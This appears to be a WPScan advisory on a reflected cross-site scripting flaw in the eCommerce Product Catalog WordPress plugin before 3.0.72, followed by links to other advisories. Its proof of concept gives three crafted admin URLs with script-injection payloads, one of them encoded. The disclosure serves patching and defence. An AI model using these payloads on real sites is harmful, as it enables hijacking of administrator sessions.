eCommerce Product Catalog Plugin for WordPress < 3.0.72 – Reflected XSS | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameter before outputting them back in attributes and JS code in admin dashboards, leading to Reflected Cross-Site Scripting

Proof of Concept

Make a logged in admin open one of the URLs below

https://example.com/wp-admin/edit.php?post_type=al_product&page=extensions.php&implecode_install=1&slug=a&url="><script>alert(/XSS/)</script>

https://example.com/wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=aaa&find_option_name=</script><script>alert(/XSS/)</script>
https://example.com/wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=aaa&find_option_name=%2527]%2522)%3Balert(/XSS/)//

Affects Plugins

ecommerce-product-catalog

Fixed in 3.0.72

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

739c9c3d-a543-4d5e-aa2a-bc74ee2c1d1d

Timeline

Publicly Published

2022-10-17 (about 3 years ago)

Added

2022-10-17 (about 3 years ago)

Last Updated

2022-10-17 (about 3 years ago)

Other

Published

Title

Published

2025-06-03

Title

WC MyParcel Belgium < 4.5.6-beta - Reflected Cross-Site Scripting

Published

2024-01-02

Title

FooGallery Premium < 2.4.6 - Contributor+ Stored XSS

Published

2024-03-22

Title

Custom WooCommerce Checkout Fields Editor < 1.3.2 - Authenticated (Subscriber+) Stored Cross-Site Scripting

Published

2015-08-21

Title

YITH Maintenance Mode < 1.2.0 - Authenticated Reflected Cross-Site Scripting (XSS)

Published

2022-06-13

Title

Ninja Forms < 3.6.10 - Admin+ Stored Cross-Site Scripting